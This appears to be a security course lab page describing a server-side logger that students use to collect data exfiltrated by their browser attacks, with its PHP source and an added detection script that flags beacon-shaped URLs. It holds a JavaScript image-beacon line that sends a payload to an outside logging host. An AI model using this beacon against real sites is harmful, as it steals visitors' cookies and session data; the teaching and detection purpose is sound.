You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

```javascript
(new Image()).src='https://css.csail.mit.edu/6.858/2022/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
```
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
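From the monitoring side, a request built this way has a recognizable shape: a cache-busting `Math.random()` value next to a parameter carrying the extracted data. The following is an added example, not part of the original page or the course's code, that scores request URLs (for instance from proxy logs) for that shape; the heuristics, threshold, hosts and sample URLs are all constructed assumptions.

```javascript
// Added example: score request URLs (e.g. from proxy logs) for the beacon shape above.
// Heuristics, threshold, hosts and sample URLs are constructed for illustration.

// Math.random() normally stringifies as "0." followed by many digits.
const CACHE_BUSTER = /^0\.\d{6,}$/;
// A long hex run, typical of session tokens.
const HEX_TOKEN = /[0-9a-f]{32}/i;
// A decoded parameter value that itself looks like "name=value" (a cookie pair).
const COOKIE_PAIR = /^[\w.-]+=\S+/;

function scoreUrl(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch (err) {
    return { url: rawUrl, score: 0, reasons: ['unparseable'] };
  }
  const reasons = [];
  // searchParams percent-decodes values, so URL-encoded cookies still match.
  for (const [name, value] of url.searchParams) {
    if (CACHE_BUSTER.test(value)) reasons.push('cache-buster:' + name);
    if (HEX_TOKEN.test(value)) reasons.push('hex-token:' + name);
    if (COOKIE_PAIR.test(value)) reasons.push('cookie-pair:' + name);
  }
  return { url: rawUrl, score: reasons.length, reasons };
}

// Two or more independent signals on one request is worth an analyst's look.
function flagBeacons(urls, threshold = 2) {
  return urls.map(scoreUrl).filter((r) => r.score >= threshold);
}

// Constructed sample request URLs; the token is a made-up value.
const SAMPLE_URLS = [
  'https://logger.example/log.php?id=user1&payload=sid%3Dguest%230123456789abcdef0123456789abcdef&random=0.7264519038',
  'https://cdn.example/img/logo.png?v=3',
  'https://stats.example/pixel.gif?page=%2Fhome&cb=0.5528194731',
  'not a url',
];

const flagged = flagBeacons(SAMPLE_URLS);
console.log(flagged);
```

A cache-buster alone (the third sample, an ordinary tracking pixel) stays below the threshold; only the combination with a cookie-shaped or token-shaped value is flagged.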
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
```php
<?php
do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }
    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }
    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }
    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }
    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }
    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);
    $file = fopen("/tmp/6.858-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }
    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }
    flock($file, LOCK_UN);
    fclose($file);
    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.858/2022/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
  <link rel="stylesheet" type="text/css" href="labs.css" />
  <title>Lab 4 Logging Script</title>
</head>
<body>
<h1>Lab 4 Logging Script</h1>
<p>
  You can use this server side script to extract data from
  client-side JavaScript. For example, clicking this client-side hyperlink
  will cause the server to log the payload:
</p>
<pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
<p>
  The random argument is ignored, but ensures that the browser
  bypasses its cache when downloading the image. We suggest that you use the
  random argument in your scripts as well. The ID argument will help you
  distinguish your log entries from those sent by other students; we suggest
  picking your MIT Athena username. Newlines are not allowed in
  <tt>javascript:</tt> links; if this bothers you, try
  <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
</p>
<h2>Test form</h2>
<p>
  If you just want to try out the script, you can use this form.
  (For your actual attacks in lab 4, you'll probably want to use the
  JavaScript image technique shown above.)
</p>
<form method="GET" action="">
  <label for="id">ID:</label><br />
  <input name="id" placeholder="your-mit-username" size="40" />
  <i>(some identifier to locate your payload in the log)</i>
  <br />
  <br />
  <label for="payload">Payload:</label><br />
  <input name="payload" placeholder="some-string" size="40" />
  <i>(the information you stole)</i>
  <br />
  <input type="submit" value="Log" name="log_submit" />
</form>
<h2>Logged entries</h2>
<p>
  Below are the most recent logged entries, so that you can check
  if your attack worked:
</p>
<pre class="tty"><?php
$lines = file_get_contents("/tmp/6.858-logger.txt");
echo htmlspecialchars($lines);
?></pre>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>
```